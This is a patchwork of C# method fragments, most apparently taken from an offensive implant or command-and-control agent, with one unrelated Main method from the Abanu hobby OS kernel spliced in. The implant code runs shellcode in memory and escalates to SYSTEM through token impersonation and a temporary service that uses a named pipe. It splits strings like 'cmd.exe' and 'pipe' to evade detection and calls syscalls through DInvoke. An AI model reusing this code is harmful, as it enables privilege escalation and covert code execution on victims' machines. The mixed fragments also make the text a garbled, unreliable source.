public Controller(string id, string url, string password) { _id = id; _p = password; _jobsManager = new Jobs(url); _sysCall = new SysCallManager(); _tokenManager = new TokenManager(_sysCall); _tempPath = Environment.GetEnvironmentVariable("temp") ?? @"C:\Windows\Temp\"; }
public static void Main(byte[] shellCode, SysCallManager sysCall, int pid) { var obj = new LauncherShellCode(); var thr1 = new Thread(ExecuteShellCodeInMemory); var a = new object[] { shellCode, sysCall, pid }; thr1.Start(a); }
public bool GetSystem(SysCallManager sysCall) { try { List <int> pids = Utils.getSystemPID(sysCall); foreach (var pid in pids) { if (Impersonate(pid, sysCall)) { return(true); } } } catch {} _pipeName = Jobs.RandomString(7); string service = Jobs.RandomString(7); var exit = false; var server = new Thread(ServerThread); var cmd = "sc create " + service + " binpath= \"c:\\windows\\sys" + "tem32\\cm" + "d.exe /C " + "echo data > \\\\.\\pi" + "pe\\" + _pipeName + "\""; Utils.ExecuteCommand(cmd, sysCall); server.Start(); Thread.Sleep(250); cmd = "sc start " + service; Utils.ExecuteCommand(cmd, sysCall); while (!exit) { if (server.Join(250)) { exit = true; } } cmd = "sc delete " + service; Utils.ExecuteCommand(cmd, sysCall); if (_token != IntPtr.Zero) { return(true); } return(false); }
public static unsafe void Main() { try { ManagedMemoy.InitializeGCMemory(); StartUp.InitializeAssembly(); KMath.Init(); //Mosa.Runtime.StartUp.InitializeRuntimeMetadata(); BootInfo.SetupStage1(); Memory.InitialKernelProtect(); ApiContext.Current = new ApiHost(); Assert.Setup(AssertError); // Setup some pseudo devices DeviceManager.InitStage1(); //Setup Output and Debug devices DeviceManager.InitStage2(); // Write first output KernelMessage.WriteLine("<KERNEL:CONSOLE:BEGIN>"); PerformanceCounter.Setup(BootInfo.Header->KernelBootStartCycles); KernelMessage.WriteLine("Starting Abanu Kernel..."); KernelMessage.WriteLine("KConfig.UseKernelMemoryProtection: {0}", KConfig.UseKernelMemoryProtection); KernelMessage.WriteLine("KConfig.UsePAE: {0}", KConfig.UsePAE); KernelMessage.WriteLine("Apply PageTableType: {0}", (uint)BootInfo.Header->PageTableType); KernelMessage.WriteLine("GCInitialMemory: {0:X8}-{1:X8}", Address.GCInitialMemory, Address.GCInitialMemory + Address.GCInitialMemorySize - 1); Ulongtest1(); Ulongtest2(); InlineTest(); // Detect environment (Memory Maps, Video Mode, etc.) BootInfo.SetupStage2(); KernelMemoryMapManager.Setup(); //KernelMemoryMapManager.Allocate(0x1000 * 1000, BootInfoMemoryType.PageDirectory); // Read own ELF-Headers and Sections KernelElf.Setup(); // Initialize the embedded code (actually only a little proof of concept code) NativeCalls.Setup(); //InitialKernelProtect(); PhysicalPageManager.Setup(); KernelMessage.WriteLine("Phys free: {0}", PhysicalPageManager.FreePages); PhysicalPageManager.AllocatePages(10); KernelMessage.WriteLine("Phys free: {0}", PhysicalPageManager.FreePages); VirtualPageManager.Setup(); Memory.Setup(); // Now Memory Sub System is working. At this point it's valid // to allocate memory dynamically DeviceManager.InitFrameBuffer(); // Setup Programmable Interrupt Table PIC.Setup(); // Setup Interrupt Descriptor Table // Important Note: IDT depends on GDT. Never setup IDT before GDT. IDTManager.Setup(); InitializeUserMode(); SysCallManager.Setup(); KernelMessage.WriteLine("Initialize Runtime Metadata"); StartUp.InitializeRuntimeMetadata(); KernelMessage.WriteLine("Performing some Non-Thread Tests"); Tests(); } catch (Exception ex) { Panic.Error(ex.Message); } if (KConfig.SingleThread) { StartupStage2(); } else { ProcessManager.Setup(StartupStage2); } }
public TokenManager(SysCallManager sysCall) { Token = IntPtr.Zero; Method = 0; this.sysCall = sysCall; }
public HookManager(SysCallManager sysCall) { this.sysCall = sysCall; originalOpcodes = is64BitsProcessor() ? new byte[13] : new byte[6]; }
/////////////////////////// Impersonation /////////////////////////// public bool Impersonate(int pid, SysCallManager sysCall) { var privileges = new List <string> { "SeDebugPrivilege", "SeImpersonatePrivilege", "SeTcbPrivilege", "SeAssignPrimaryTokenPrivilege", "SeIncreaseQuotaPrivilege" }; try { Utils.GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges, out var token, sysCall); Utils.EnablePrivileges(token, privileges, sysCall); Utils.GetProcessHandle(pid, out var handlePointer, DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_QUERY_INFORMATION, sysCall); Utils.GetProcessToken(handlePointer, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenDuplicate, out var tokenPointer, sysCall); Utils.CloseHandle(handlePointer); if (tokenPointer == IntPtr.Zero) { return(false); } var tokenAccess = DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenQuery | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAssignPrimary | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenDuplicate | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustDefault | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustSessionId; Utils.DuplicateToken(tokenPointer, tokenAccess, DInvoke.Win32.WinNT._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, DInvoke.Win32.WinNT.TOKEN_TYPE.TokenPrimary, out var impToken, sysCall); if (impToken == IntPtr.Zero) { return(false); } var startupInfo = new DInvoke.Win32.WinNT.StartupInfo(); startupInfo.cb = Marshal.SizeOf(startupInfo); startupInfo.lpDesktop = ""; startupInfo.wShowWindow = 0; startupInfo.dwFlags |= 0x00000001; var processInfo = new DInvoke.Win32.Kernel32.ProcessInformation(); if (_method == 0) { try { Utils.DetermineImpersonationMethod(impToken, new DInvoke.Win32.Kernel32.LogonFlags(), startupInfo, out processInfo); } catch { return(false); } } if (_method != 0) { _token = impToken; return(true); } } catch { } return(false); }